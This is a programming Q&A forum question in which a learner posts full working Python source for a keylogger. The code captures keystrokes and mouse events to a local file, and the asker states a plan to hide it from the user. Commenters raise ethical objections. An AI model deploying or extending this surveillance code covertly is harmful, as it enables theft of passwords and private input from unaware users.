# KeyLogger find trigger of event

Tags: python, events, logging, eventtrigger, keylogger

Next year I will study applied informatics with the focus on IT Security, but I already wanna learn even more Python and about IT Security. So I tried to write a KeyLogger, which is good and works. Code later. It logs the Keyboard input and the mouse input. Now I wanna try this: I wanna have the trigger from the events: comes the input from the device, or from a bad program (then I will have the process id)?
I would prefer to complete this with python code, maybe with a C/C++ library, if absolutely necessary I also would learn it with another language. But I didn´t find a solution for my problem after days of searching...
Later I wanna also make this as a service, or at least that the user can´t see the Keylogger. (No, I´m a good boy, it´s 100% for my own to learn this and how to protect, I have 3 computers and wanna create a little test laboratory). 
It would yet be a great help if you give me links or books to learn the necessary knowledge!

Here´s the code:

```
    # coding=utf-8

from pynput import mouse, keyboard
import threading
import time

run = True
f = open("log.txt", "w")


def on_press(key):
    global run
    if run:
        try:
            log('{0} pressed'.format(key.char))
        except AttributeError:
            log('{0} pressed'.format(key))
        except UnicodeEncodeError:
            log('{0} pressed'.format(key))
        # DEMO/DEBUG (hit Esc to stop)
        if key == keyboard.Key.esc:
            run = False  # to close the mouse listener
            stop()
    if not run:
        stop()

def on_release(key):
    if run:
        try:
            log('{0} released'.format(key.char))
        except AttributeError:
            log('{0} released'.format(key))
        except UnicodeEncodeError:
            log('{0} released'.format(key.char.encode("utf-8")))
    if not run:
        stop()

def on_click(x, y, button, pressed):
    if run:
        log('{0} {1} at {2}'.format(button, 'Pressed'
        if pressed else 'Released', (x, y)))
        # DEBUG/DEMO (you have to click somewhere after pressing "esc")
    if not run:
        stop()


def on_scroll(x, y, dx, dy):
    if run:
        dirx = ''
        diry = ''
        if dy > 0:
            dirx = 'up'
        elif dy < 0:
            dirx = 'down'
        if dx > 0:
            dirx = 'rigth'
        elif dx < 0:
            dirx = 'left'
            log('Scrolled {0} to {1}{2}'.format((x, y), dirx, diry))
    if not run:
        stop()

def log(str):
    print(str)
    # if lastTask != str:
    f.write(keep_distance(str) + time.asctime() + "\n")  # log "str" beautiefully in the f
    # global lastTask = str


def keep_distance(str, distance=38):
    """Add a buffer behind the string.
    (To show it nicely in a table.)"""
    buffer_len = distance - str.count('')
    buffer = ''
    buffer = ''
    buffer = ''
    for i in range(buffer_len):
        buffer += ' '
    return str + buffer


def stop():
    print("KeyLogger stopped...")
    log("KeyLogger stopped...")
    exit(0)


class Logger(threading.Thread):
    def __init__(self, device):
        threading.Thread.__init__(self)
        self.device = device
        self.start()

    def run(self):
        if self.device == "mouse":
            with mouse.Listener(on_click=on_click, on_scroll=on_scroll) as listener:
                listener.join()
        elif self.device == "keyboard":
            with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
                listener.join()


mouse_log = Logger("mouse")
kb_log = Logger("keyboard")
```

Comment: Something just isn't... right... about helping with this.

Comment: what do you mean, ProEvilz?

Comment: Keyloggers are maliciously used 99.9% of the time so to help you with this just feels wrong.

Comment: I know it´s hard to believe and proof, but I wanna just learn in my own little network without any internet connection, study next year IT Sec and wanna work in the IT Sec. It´s nothing other than learn this to then find something to protect. I want to see with this, if there´s a problem with th hardware or a bad program. I´m (again and again and again in every area of my live...) the 00.01% of the good guys.

Comment: So then study it in IT...

Comment: This is gonna take a few years and maybe we don´t even learn python. But if you won´t help me, I understand it.